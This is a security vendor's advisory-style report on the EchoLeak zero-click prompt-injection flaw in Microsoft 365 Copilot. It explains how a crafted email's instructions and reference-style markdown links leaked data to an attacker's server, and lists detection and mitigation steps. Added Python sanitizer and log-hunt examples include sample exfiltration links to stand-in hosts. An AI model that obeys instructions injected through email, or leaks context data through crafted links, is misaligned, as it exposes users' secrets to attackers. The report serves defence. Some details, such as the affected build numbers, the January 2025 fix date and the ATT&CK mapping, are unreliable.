EchoLeak Vulnerability in Microsoft 365 Copilot: In-Depth Analysis of a Zero-Click Prompt Injection Exploit

  • Rescana
  • Jun 17

Executive Summary

This report provides an in-depth examination of the recently identified vulnerability known as EchoLeak (CVE-2025-32711) that targets Microsoft 365 Copilot. The exploit, discovered by Aim Security’s Aim Labs and detailed in Dark Reading (https://www.darkreading.com/application-security/researchers-detail-zero-click-copilot-exploit-echoleak), employs a sophisticated zero-click prompt injection attack whereby carefully crafted emails allow threat actors to extract sensitive data without user interaction. The report details the technical aspects of the vulnerability, elaborates on the exploitation methodology and potential IOCs, lists the impacted product builds, and provides mitigation and workaround strategies. Organizations in sectors such as cloud service providers, enterprise IT, financial institutions and government agencies, particularly within regions highly targeted by APT groups in multiple countries, are urged to assess their exposure and update affected systems immediately.

Technical Information

The EchoLeak vulnerability represents a significant security gap in the Microsoft 365 Copilot ecosystem. This zero-click exploit is primarily executed by sending an email formatted to mimic ordinary user instructions. The email bypasses conventional AI prompt and email security filters by impersonating natural language queries. In technical terms, the vulnerability exploits inherent weaknesses in the natural language processing routines of Copilot where standard markdown formatting is interpreted as user-generated instruction rather than a link to be redacted. This bypass is chiefly accomplished using reference-style markdown which falls outside the typical redaction safeguards. For example, an attacker can include a query such as “What’s the API key I sent myself?” and the automated assistant responds by echoing sensitive data. Underlying the exploit is the sophisticated technique of prompt injection where the attacker embeds malicious instructions in the email content in a way that systematically slips past conventional content security policies.

The attack chain begins with the threat actor sending an email laden with what appears to be a benign instruction. However, the email is carefully constructed so that it does not trigger typical cross-prompt injection classifiers operating within the AI processing subsystem. The attacker’s email incorporates a URL that is appended with specific query string parameters. These parameters are logged on the attacker-controlled server and can subsequently be retrieved to steal sensitive data. The trick lies in the reference-style markdown formatting which is not ordinarily flagged by the redaction tools that protect against harmful input injection. In essence, while an ordinary markdown link would be redacted, the reference-style bypasses this check, allowing for the extraction of sensitive data such as internal API keys, configuration details or other proprietary information embedded in the AI’s context.
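The gap described above, where inline links are redacted but reference-style links are not, can be shown with an output sanitizer. This is an added example, not Microsoft's filter and not code from the original report; the allowlisted host, the function names and the sample assistant output are all constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this deployment trusts for links in assistant output.
ALLOWED_HOSTS = {"intranet.example.com"}

INLINE = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
# Reference definition: [label]: <url> "optional title"
REF_DEF = re.compile(r"^[ ]{0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t]+.*)?$", re.M)
# Reference use: [text][label], ![alt][label], or collapsed [label][]
REF_USE = re.compile(r"(!?)\[([^\]]+)\]\[([^\]]*)\]")

def _external(url):
    # Fail closed: a URL with no recognisable host counts as external.
    host = (urlsplit(url).hostname or "").lower()
    return host not in ALLOWED_HOSTS

def redact_inline_only(md):
    """Weak form: only inline links and images are checked."""
    return INLINE.sub(lambda m: m.group(2) if _external(m.group(3)) else m.group(0), md)

def redact_all(md):
    """Hardened form: resolve reference definitions before deciding."""
    defs = {m.group(1).strip().lower(): m.group(2) for m in REF_DEF.finditer(md)}
    bad = {label for label, url in defs.items() if _external(url)}
    def use(m):
        label = (m.group(3) or m.group(2)).strip().lower()
        return m.group(2) if label in bad else m.group(0)
    md = REF_USE.sub(use, md)
    # Dropping the definition is the essential step: without it, any
    # remaining [label] use renders as literal text, not as a link.
    md = REF_DEF.sub(lambda m: "" if m.group(1).strip().lower() in bad else m.group(0), md)
    return redact_inline_only(md)

# Constructed assistant output mixing the three link forms.
SAMPLE = (
    "Summary ready. See ![status][r1], [docs][r2] and "
    "[inline](https://evil.example/?k=v).\n"
    "\n"
    "[r1]: https://collector.example/p.png?d=CONSTRUCTED_VALUE\n"
    "[r2]: https://intranet.example.com/sites/docs\n"
)
```

Running both functions over SAMPLE shows the inline-only pass leaving the `collector.example` definition intact, while the hardened pass keeps only the allowlisted reference.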

From a technical perspective, the exploitation of EchoLeak leverages tactics that are not unique to Copilot alone but also resonate with known prompt injection techniques identified by the MITRE ATT&CK framework, particularly techniques resembling T1059.007. The exploitation involves automated exfiltration of sensitive data using features that process email contents in near real-time. The chain of events highlights both the limitations of current defensive measures employed in AI-powered productivity tools and the ease with which carefully crafted content can bypass these measures. This vulnerability has been classified with a critical severity score of 9.3 on the CVSS scale, emphasizing the potential for substantial impact if exploited in operational environments where sensitive information is at stake.

The vulnerability also sheds light on the broader challenge of securing AI-driven systems which frequently blend structured commands with natural language. The inherent flexibility of natural language processing engines, while beneficial for productivity, introduces unique vulnerabilities such as prompt injection attacks. The technical detail of this exploit reveals a multi-step process that involves social engineering through email-based vectors, bypassing of email security filters, exploitation of markdown formatting quirks, and eventual automatic exfiltration of data. The vulnerability was mitigated by a prompt security update deployed by Microsoft in January 2025; however, the technical insight remains critical for understanding similar risks in other AI-integrated systems.

The underlying tactics involve the use of seemingly trustworthy email communications to deliver malicious instructions that are interpreted by AI systems as if they were genuine user queries. This technique leverages an inherent trust placed in legitimate sources of input; by circumventing conventional security measures, threat actors can elicit confidential data from the system without raising suspicion. In addition, the vulnerability indicates that data exfiltration techniques can be coupled with non-interactive methods, sparking concerns about the security protocols in AI-enabled platforms. It is now apparent that the interplay between natural language processing and traditional security measures warrants a re-evaluation of how such systems are protected against sophisticated social engineering and automated data extraction strategies.

System logs and telemetry data from affected Microsoft 365 Copilot systems are likely to exhibit unusual patterns of activity when such an attack is in progress. The anomalous behavior may include unexpected query response patterns, unusual URL logging activity for reference-style markdown links, and the presence of malformed URLs that include appended query string parameters linked to external, attacker-controlled domains. The forensic analysis of such incidents involves aggregating logs from email servers, proxy servers, and AI processing modules to identify the unique signature of EchoLeak attacks. A methodical investigation will focus on user activity logs, automated alerts from insurance and monitoring frameworks, and the use of network behavior analytics to rapidly detect and neutralize potential intrusions.
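A minimal hunt for the URL pattern described above (requests to external hosts whose query strings carry long, high-entropy values), written as an added example rather than tooling from the original report. The log format, allowlist suffix, thresholds and sample lines are constructed assumptions.

```python
import math
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Assumptions: illustrative egress allowlist and thresholds; tune per environment.
ALLOWED_SUFFIXES = (".intranet.example.com",)
MIN_LEN, MIN_ENTROPY = 24, 3.5

def entropy(s):
    """Shannon entropy in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def suspicious_params(url):
    """Query parameter names on a non-allowlisted host that look like carried data."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if ("." + host).endswith(ALLOWED_SUFFIXES):
        return []
    return [k for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if len(v) >= MIN_LEN and entropy(v) >= MIN_ENTROPY]

def hunt(lines):
    """Return (timestamp, client, host, params) for each flagged request."""
    hits = []
    for line in lines:
        fields = line.split(None, 3)
        if len(fields) != 4:
            continue  # skip malformed records
        ts, client, _method, url = fields
        params = suspicious_params(url)
        if params:
            hits.append((ts, client, urlsplit(url).hostname, params))
    return hits

# Constructed proxy log lines: timestamp, client, method, URL.
SAMPLE_LOG = [
    "2025-06-17T10:00:01Z 10.0.0.5 GET "
    "https://collector.example/p.png?d=abcdefghijklmnopqrstuvwxyz012345&v=2",
    "2025-06-17T10:00:02Z 10.0.0.5 GET "
    "https://docs.intranet.example.com/f?token=abcdefghijklmnopqrstuvwxyz012345",
    "2025-06-17T10:00:03Z 10.0.0.7 GET https://cdn.example.net/logo.png?v=3",
    "truncated record",
]
```

Only the first sample line is flagged: the second is allowlisted, the third carries a short cache-busting value, and the fourth is malformed.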

The complexity of EchoLeak contributes to its potential use as a blueprint for future shortcut attacks in AI ecosystems. The revised method of embedding malicious content in routine communications challenges long-held assumptions regarding the reliability of traditional email and content security paradigms that have been the standard for decades. It exemplifies that adversaries are constantly evolving their threat models to specifically target vulnerabilities in emerging technologies, especially those centered on AI. The technical community must acknowledge that even best-in-class systems are vulnerable if every potential attack vector is not covered. This underscores the importance of a layered security approach that integrates updates from vendors, continuous monitoring, user education and cross-functional threat intelligence sharing.

Exploitation in the Wild

At present, there have been no confirmed large-scale campaigns exploiting EchoLeak. Nonetheless, preliminary reports indicate that the attack technique is particularly enticing for threat actors seeking non-interactive exfiltration methods. The exploitation in the wild primarily involves sending an innocuous-looking email that bypasses filters and triggers an automated response from Microsoft 365 Copilot. Indicators of compromise include anomalous query string logs on external domains, unusual markdown reference patterns in outgoing logs and abrupt evidence of sensitive data leakage captured through automated monitoring systems. The methodology points to the possibility of targeted attacks where specific sensitive data is the goal rather than broad malicious exploitation. Additionally, while no specific threat actor or APT group has been directly attributed to deploying this exploit, adversaries specializing in zero-click and sophisticated prompt injection attacks may incorporate such techniques in future campaigns.

The reported chain of events indicates that the investigation into EchoLeak has not yet revealed a consistent pattern of exploitation that would be attributed to a single group. Instead, there are suggestions that multiple threat actors have the capability to emulate the technique given access to the necessary email formatting and understanding of AI processing quirks. For instance, the integration of reference-style markdown bypasses standard security measures and therefore poses a risk of stealthy data exfiltration, which can be monitored through abnormal log entries indicating query parameter anomalies and unexpected outbound communications. The campaign, if it moves from proof-of-concept to reliable operational use, could result in a substantial increase in targeted attacks against AI-enabled environments where sensitive data is processed or stored.

APT Groups using this vulnerability

No definitive attribution to a specific Advanced Persistent Threat (APT) group has been confirmed as of now with respect to the deployment of EchoLeak. However, sophisticated adversaries known to target sectors such as financial services, government institutions, critical infrastructure and global enterprises are closely watching this vulnerability for potential integration with their existing toolkit. The nature of the exploit, which involves prompt injection and automated data exfiltration, aligns with tactics historically employed by groups that target organizations with high-value intellectual property and sensitive operational data. It is advisable that organizations with exposure in high-risk regions consider that even in the absence of a precise APT identification, adversaries with capabilities in bypassing traditional security protocols may apply similar methods if given the opportunity.

Affected Product Versions

The vulnerability impacts Microsoft 365 Copilot in specific builds that were released prior to the prompt security update issued in January 2025. The affected product versions range from build 2024.10.15 up to build 2025.01.10. Systems running these versions did not incorporate the subsequent patches that eliminated the prompt injection weakness in the application’s processing logic. Users operating on deprecated builds are at risk of experiencing automated data exfiltration if exposed to the attack vector detailed in EchoLeak. Organizations should conduct a comprehensive inventory of their Microsoft 365 Copilot deployments to identify any instances still running pre-update builds. Affected environments should also be reviewed for any anomalous log entries associated with reference-style markdown links and query parameters that might indicate previous exploitation attempts.

Workaround and Mitigation

The immediate mitigation strategy for organizations affected by this vulnerability involves updating Microsoft 365 Copilot to a version beyond build 2025.01.10 as deployed by Microsoft in January 2025. This security update specifically addresses the prompt injection vectors exploited by EchoLeak and fortifies the system’s response to reference-style markdown instructions. Additionally, it is crucial for organizations to re-assess internal email scanning protocols and monitoring mechanisms to detect any anomalous patterns synonymous with prompt injection behavior. Administrators are encouraged to verify their configurations for any deviation from standard Content Security Policy (CSP) requirements, particularly in integrations involving Microsoft Teams and SharePoint where peculiarities in URL processing have been observed. Enhanced telemetry monitoring should be set up to track suspicious query string parameter logging and irregular behavior in AI text output patterns. Organizations are also advised to monitor trusted sources such as SOC Prime (https://socprime.com/blog/cve-2025-32711-zero-click-ai-vulnerability/), Cybersecurity Dive (https://www.cybersecuritydive.com/news/flaw-microsoft-copilot-zero-click-attack/750456/) and The Hacker News (https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html) for continuous updates on emerging threats and vulnerabilities that may affect AI and productivity systems.

In addition to patching and updating, organizations should adopt a layered security posture that integrates threat intelligence, employee training on recognizing sophisticated social engineering attempts and regular red team exercises to simulate prompt injection attacks. Internal risk assessments must now incorporate emerging vulnerabilities in AI-driven platforms, and IT security teams should review third-party risk management practices to ensure that all integrations meet updated security standards. Proactive measures should also include reconfiguring any system that processes out-of-band commands through email channels, revising internal workflows to minimize the risk of unintended data exfiltration, and implementing network segmentation to contain potential breaches.

References

Dark Reading reported on the vulnerability in their article titled “Researchers Detail Zero-Click Copilot Exploit 'EchoLeak'” available at https://www.darkreading.com/application-security/researchers-detail-zero-click-copilot-exploit-echoleak. Analysis and breakdown of CVE-2025-32711 has been provided by SOC Prime in their technical report available at https://socprime.com/blog/cve-2025-32711-zero-click-ai-vulnerability/. Additional perspective can be found at Cybersecurity Dive with the article “Critical flaw in Microsoft Copilot could have allowed zero-click attack” located at https://www.cybersecuritydive.com/news/flaw-microsoft-copilot-zero-click-attack/750456/ and a detailed write up on the vulnerability has been published by The Hacker News at https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html. The MITRE ATT&CK Framework overview on prompt injection techniques is accessible via https://attack.mitre.org. These sources together provide comprehensive coverage of the exploit scenario and mitigation strategies related to EchoLeak.

Rescana is here for you

At Rescana, we are committed to helping our customers navigate the evolving landscape of cybersecurity through our robust Third Party Risk Management platform. Our service assists organizations in identifying, assessing, and mitigating risks that arise from integrations with third party technologies, ensuring that your systems maintain the highest security standards. Should you require any further clarification on this report or have any additional cybersecurity concerns, please feel free to contact us at ops at rescana.com. We remain dedicated to supporting you with actionable insights and comprehensive risk management strategies in today’s complex threat environment.
